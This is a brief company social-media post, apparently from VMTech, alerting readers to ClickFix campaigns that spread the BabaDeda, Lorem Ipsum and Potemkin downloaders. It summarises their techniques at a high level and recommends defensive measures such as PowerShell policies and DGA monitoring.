VMTech
+381 11 4150 20024/7 Discuss a project
← All Instagram insights VMTECH · INSTAGRAM

ClickFix: BabaDeda, Lorem Ipsum and Potemkin — new downloaders in attacks

ClickFix: BabaDeda, Lorem Ipsum и Potemkin — новые загрузчики в атаках

Colleagues — a cybersecurity alert: ClickFix campaigns deploy new downloaders.

- Who: Morphisec, BlueVoyant and Huntress report BabaDeda, Lorem Ipsum and Potemkin.
- How: ClickFix social engineering (fake updates, command injection), compromised WordPress, ZIP/MSI/HTA, DLL side‑loading, external storage (Storage Crypter).
- What: info‑stealers, RATs, RMM, stealth in‑memory execution, DGA and resilient C2.
- I recommend: block in‑browser command injection, enforce strict PowerShell policies, control DLL loading and monitor DGA/anomalies.

Why it matters: ClickFix exploits the human factor and reduces the effectiveness of traditional defenses.

Which of these measures do you consider priorities?

#cybersecurity #malware #SOC #infosec

Latest comments

No comments yet.